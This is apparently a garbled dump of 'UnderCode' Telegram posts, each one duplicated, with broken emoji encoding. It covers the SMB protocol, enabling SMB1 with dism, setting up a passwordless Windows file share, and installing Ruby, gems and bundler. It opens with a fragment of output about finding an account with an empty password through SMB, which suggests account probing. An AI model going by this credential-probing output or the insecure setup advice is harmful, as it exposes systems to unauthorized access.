\ UndercOdeTesting (Windows 10.0 Build 18362)
Another account was found for which the message STATUS_ACCOUNT_RESTRICTION was received:
mial:
The message said that there are account restrictions for the mial user. The reason is that the username and password are correct (empty password), but users without a password are not allowed on this computer.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Smb Protocol windows :
Twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Server Message Block (SMB) is a networking file share protocol included in Windows 10 that provides the ability to read and write files and perform other service requests to network devices.
2) Usually, you'll be using SMB to connect to devices that don't run Windows, such as a router with file sharing capabilities, Network-Attached Storage (NAS), or other computers running Linux.
3) Although there have been three major releases of the protocol, there is a chance that you may still have devices running the original version, such as SMB version 1 (v1) which is old and insecure, and Windows 10 no longer installs it by default starting with the Fall Creators Update and April 2018 Update. As a result, you'll get error messages like "You can't connect to the file share because it's not secure;" "The specified network name is no longer available;" and "Unspecified error 0x80004005" when trying to access your files.
Thats all!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Smb Protocol windows :
Twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Server Message Block (SMB) is a networking file share protocol included in Windows 10 that provides the ability to read and write files and perform other service requests to network devices.
2) Usually, you'll be using SMB to connect to devices that don't run Windows, such as a router with file sharing capabilities, Network-Attached Storage (NAS), or other computers running Linux.
3) Although there have been three major releases of the protocol, there is a chance that you may still have devices running the original version, such as SMB version 1 (v1) which is old and insecure, and Windows 10 no longer installs it by default starting with the Fall Creators Update and April 2018 Update. As a result, you'll get error messages like "You can't connect to the file share because it's not secure;" "The specified network name is no longer available;" and "Unspecified error 0x80004005" when trying to access your files.
Thats all!
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦SMB protocol recommended settings by UndercOde:
> Optional: there are several versions of the SMB protocol and by default the first version is disabled on modern Windows systems.
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Samba uses the first version for some functions, so if you have a mixed Linux network or if you have outdated equipment that only supports SMB 1, then you can enable support for this version of the protocol. To do this, run cmd with administrator privileges. Check:
> dism /online /get-features /format:table | find "SMB1"
2) To enable SMB 1, do:
> dism /online /enable-feature /all /featurename:SMB1Protocol-Server
3) If you want to disable them, then do:
> dism /online /disable-feature /featurename:SMB1Protocol-Server
4) If you prefer a graphical interface, then in the search, type β Turn Windows features on or off
search ,switych to on then apply
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦SMB protocol recommended settings by UndercOde:
> Optional: there are several versions of the SMB protocol and by default the first version is disabled on modern Windows systems.
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Samba uses the first version for some functions, so if you have a mixed Linux network or if you have outdated equipment that only supports SMB 1, then you can enable support for this version of the protocol. To do this, run cmd with administrator privileges. Check:
> dism /online /get-features /format:table | find "SMB1"
2) To enable SMB 1, do:
> dism /online /enable-feature /all /featurename:SMB1Protocol-Server
3) If you want to disable them, then do:
> dism /online /disable-feature /featurename:SMB1Protocol-Server
4) If you prefer a graphical interface, then in the search, type β Turn Windows features on or off
search ,switych to on then apply
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to set up a network share on Windows (SMB) without a password
T.me/UndercOdeTesting
1) Computers must be on the same LAN
2) if your devices are connected to the same router, then they all will have access to the shared folder.
3) If you do the configuration in virtual machines , then in the " Network " tab , select " Network Bridge " as the " Connection Type ":
4) Static IP
To configure the SMB shared folder, the static IP address of the computer where the folder will be located is optional. The shared network folder (ball) can be accessed by computer name. Nevertheless, if you are more used to using IP, then you need to configure a static IP address for the computer, which will act as a file server.
5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.
6) By default, in the Windows operating system, all computers have the same workgroup with the name WORKGROUP .
7) To check the current group on your computer, open the explorer, find the β This computer β tab in it , click the β Computer β button at the top and click the β Properties β button in the menu that opens
8) In the new window that opens, you will see " Computer Name " and " Workgroup ":
9) If you want to change these values, then click " Change Settings ."
Click the βChangeβ button to assign a new name to the computer
10) Network Folder Settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network ball) are called β shared β.
On Windows, when connected to a new network, you may receive the request click at yes and done @UnderCodeTesting
11) A universal option, suitable for those with a wired connection or Wi-Fi: right-click on the network connection icon and click " Open network and Internet settings
12) In the window that opens, click on " Sharing Options ":
>If you want to go to these settings through the β Control Panel β, the way is: Control Panel \ Network and Internet \ Network and Sharing Center \ Additional sharing options
In the new window, the settings are divided into three sections:
Private
Guest or public
All networks
13) Shared with password protection
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to set up a network share on Windows (SMB) without a password
T.me/UndercOdeTesting
1) Computers must be on the same LAN
2) if your devices are connected to the same router, then they all will have access to the shared folder.
3) If you do the configuration in virtual machines , then in the " Network " tab , select " Network Bridge " as the " Connection Type ":
4) Static IP
To configure the SMB shared folder, the static IP address of the computer where the folder will be located is optional. The shared network folder (ball) can be accessed by computer name. Nevertheless, if you are more used to using IP, then you need to configure a static IP address for the computer, which will act as a file server.
5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.
6) By default, in the Windows operating system, all computers have the same workgroup with the name WORKGROUP .
7) To check the current group on your computer, open the explorer, find the β This computer β tab in it , click the β Computer β button at the top and click the β Properties β button in the menu that opens
8) In the new window that opens, you will see " Computer Name " and " Workgroup ":
9) If you want to change these values, then click " Change Settings ."
Click the βChangeβ button to assign a new name to the computer
10) Network Folder Settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network ball) are called β shared β.
On Windows, when connected to a new network, you may receive the request click at yes and done @UnderCodeTesting
11) A universal option, suitable for those with a wired connection or Wi-Fi: right-click on the network connection icon and click " Open network and Internet settings
12) In the window that opens, click on " Sharing Options ":
>If you want to go to these settings through the β Control Panel β, the way is: Control Panel \ Network and Internet \ Network and Sharing Center \ Additional sharing options
In the new window, the settings are divided into three sections:
Private
Guest or public
All networks
13) Shared with password protection
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install and use Ruby on Windows
twitter.com/UNDERCODETC
π¦ Why install Ruby :
> Ruby is a scripting language, that is, pre-compilation is not required to run programs. In this sense, Ruby is an analogue of PHP , Python , PERL and others.
> Ruby is a fairly popular language and many interesting programs are written on it; in terms of InfoSec, the well-known WPScan , WhatWeb , Wayback Machine Downloader and others can be cited as examples .
> By installing Ruby on Windows, you can run programs written in this language, as well as learn this programming language and write your own scripts.
> By the way, Ruby, like PHP, Python and PERL, can be a web server module, and scripts written in this language can be used as the programmatic basis of a website or service.
π¦ How to install Ruby on Windows :
1) To install, go to https://rubyinstaller.org/downloads/
2) There you will see many installer options that differ not only in versions, but also in the composition of the downloaded files.
3) Executables are self-contained installers for Windows that include the Ruby language, runtime, important documentation, and more.
4) If you do not know which version to install in order to get started with Ruby, the Ruby + Devkit 2.6.X installer (x64) is recommended .
5) It provides the largest number of compatible gem (Ruby packages) and installs MSYS2-Devkit along with Ruby, so that gem with C-extensions can be compiled immediately after installation.
6) Run the downloaded file. In this window we can select the settings
7) Add Ruby executables to your PATH - means adding a directory with Ruby executables to the system variable. This is recommended to avoid specifying the full path to the script interpreter each time the Ruby script is run.
8) Associate .rb and .rbw files with Ruby installation - means associate files with the extensions .rb and .rbw with the installed Ruby. Thanks to this, Ruby files can be launched by double-clicking or by typing the name of the script on the command line.
9) Use UTF-8 as default external encoding - means to use UTF-8 encoding as the default external encoding .
π¦Further we are invited to:
1) MSYS2 base installation<font></font>
2 ) MSYS2 system update (optional)<font></font>
3 ) MSYS2 and MINGW development toolchain<font></font>
<font></font>
Which components shall be installed? If unsure press ENTER [1,2,3]
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install and use Ruby on Windows
twitter.com/UNDERCODETC
π¦ Why install Ruby :
> Ruby is a scripting language, that is, pre-compilation is not required to run programs. In this sense, Ruby is an analogue of PHP , Python , PERL and others.
> Ruby is a fairly popular language and many interesting programs are written on it; in terms of InfoSec, the well-known WPScan , WhatWeb , Wayback Machine Downloader and others can be cited as examples .
> By installing Ruby on Windows, you can run programs written in this language, as well as learn this programming language and write your own scripts.
> By the way, Ruby, like PHP, Python and PERL, can be a web server module, and scripts written in this language can be used as the programmatic basis of a website or service.
π¦ How to install Ruby on Windows :
1) To install, go to https://rubyinstaller.org/downloads/
2) There you will see many installer options that differ not only in versions, but also in the composition of the downloaded files.
3) Executables are self-contained installers for Windows that include the Ruby language, runtime, important documentation, and more.
4) If you do not know which version to install in order to get started with Ruby, the Ruby + Devkit 2.6.X installer (x64) is recommended .
5) It provides the largest number of compatible gem (Ruby packages) and installs MSYS2-Devkit along with Ruby, so that gem with C-extensions can be compiled immediately after installation.
6) Run the downloaded file. In this window we can select the settings
7) Add Ruby executables to your PATH - means adding a directory with Ruby executables to the system variable. This is recommended to avoid specifying the full path to the script interpreter each time the Ruby script is run.
8) Associate .rb and .rbw files with Ruby installation - means associate files with the extensions .rb and .rbw with the installed Ruby. Thanks to this, Ruby files can be launched by double-clicking or by typing the name of the script on the command line.
9) Use UTF-8 as default external encoding - means to use UTF-8 encoding as the default external encoding .
π¦Further we are invited to:
1) MSYS2 base installation<font></font>
2 ) MSYS2 system update (optional)<font></font>
3 ) MSYS2 and MINGW development toolchain<font></font>
<font></font>
Which components shall be installed? If unsure press ENTER [1,2,3]
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to update Ruby on Windows:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) To upgrade to the latest patch (that is, the minor version, for example from 2.5.1 to 2.5.4), it is enough to launch a new version of the installer.
2) Installed gem (packages from the Ruby repository) are not overwritten and will work with the new version without reinstalling. To upgrade the installation, just use RubyInstaller without Devkit.
3) You can update Devkit separately by running the following command at the Windows command prompt:
> ridk install
4 )When a new major version is released, it cannot be updated by installing it in the same directory as the previous one. For example, if the previous version of the installation is RubyInstaller-2.5.x, and the new version is RubyInstaller-2.6.x, then you need to install it either in a new directory or delete the old version and install a new one instead, since gem (programs) with C extensions are not compatible between ruby-2.5 and 2.6.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to update Ruby on Windows:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) To upgrade to the latest patch (that is, the minor version, for example from 2.5.1 to 2.5.4), it is enough to launch a new version of the installer.
2) Installed gem (packages from the Ruby repository) are not overwritten and will work with the new version without reinstalling. To upgrade the installation, just use RubyInstaller without Devkit.
3) You can update Devkit separately by running the following command at the Windows command prompt:
> ridk install
4 )When a new major version is released, it cannot be updated by installing it in the same directory as the previous one. For example, if the previous version of the installation is RubyInstaller-2.5.x, and the new version is RubyInstaller-2.6.x, then you need to install it either in a new directory or delete the old version and install a new one instead, since gem (programs) with C extensions are not compatible between ruby-2.5 and 2.6.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install and use gem on Windows :
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) RubyGems is a package manager for Ruby. Using it, you can install various programs and their dependencies, installation can be done both from the source code on the local system, and from remote application sources.
2) The Ruby installation shown above also installs gem , so make sure to run the command:
> gem --help
You should see help on using gem.
3) To display all available gem commands, run:
> gem help commands
4) To install the package, run a command of the form:
> gem install
5) To show help about the installation command:
> gem help install
6) For example, to install the 'rake' program from a local directory or a remote server:
> gem install rake
7) Installing the 'rake' package only from a remote server:
> gem install rake --remote
8) Installing 'rake', but only version 0.3.1, even if there are unsatisfied dependencies, install in the user directory:
> gem install rake --version 0.3.1 --force --user-install
> gem list D
9) List local and remote gem whose name contains 'log':
> gem search log --both
10) The previous command is used to search for packages by name.
List only remote (non-local) gem whose name contains 'log':
> gem search log --remote
11) Delete 'rake':
> gem uninstall rake
12) View information about RubyGems:
> gem environment
13) Update all gem programs in the system:
> gem update
14) Update local version of RubyGems:
> gem update --system
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install and use gem on Windows :
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) RubyGems is a package manager for Ruby. Using it, you can install various programs and their dependencies, installation can be done both from the source code on the local system, and from remote application sources.
2) The Ruby installation shown above also installs gem , so make sure to run the command:
> gem --help
You should see help on using gem.
3) To display all available gem commands, run:
> gem help commands
4) To install the package, run a command of the form:
> gem install
5) To show help about the installation command:
> gem help install
6) For example, to install the 'rake' program from a local directory or a remote server:
> gem install rake
7) Installing the 'rake' package only from a remote server:
> gem install rake --remote
8) Installing 'rake', but only version 0.3.1, even if there are unsatisfied dependencies, install in the user directory:
> gem install rake --version 0.3.1 --force --user-install
> gem list D
9) List local and remote gem whose name contains 'log':
> gem search log --both
10) The previous command is used to search for packages by name.
List only remote (non-local) gem whose name contains 'log':
> gem search log --remote
11) Delete 'rake':
> gem uninstall rake
12) View information about RubyGems:
> gem environment
13) Update all gem programs in the system:
> gem update
14) Update local version of RubyGems:
> gem update --system
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install bundler :
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) bundler is a Ruby dependency manager. This manager is useful when installing other programs written in Ruby.
2) To install bundler on Windows, run:
> gem install bundler
3) To upgrade bundle, run the command:
> gem update bundle
4) If you install the program from the source code and there is a Gemfile file , then go to the folder with this program and run the command in it:
> bundle install
> This command will install all the dependencies listed in the Gemfile
5) To see where the gem packages installed with bundle are used, use the command:
> bundle info (name)_gem
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to install bundler :
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) bundler is a Ruby dependency manager. This manager is useful when installing other programs written in Ruby.
2) To install bundler on Windows, run:
> gem install bundler
3) To upgrade bundle, run the command:
> gem update bundle
4) If you install the program from the source code and there is a Gemfile file , then go to the folder with this program and run the command in it:
> bundle install
> This command will install all the dependencies listed in the Gemfile
5) To see where the gem packages installed with bundle are used, use the command:
> bundle info (name)_gem
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β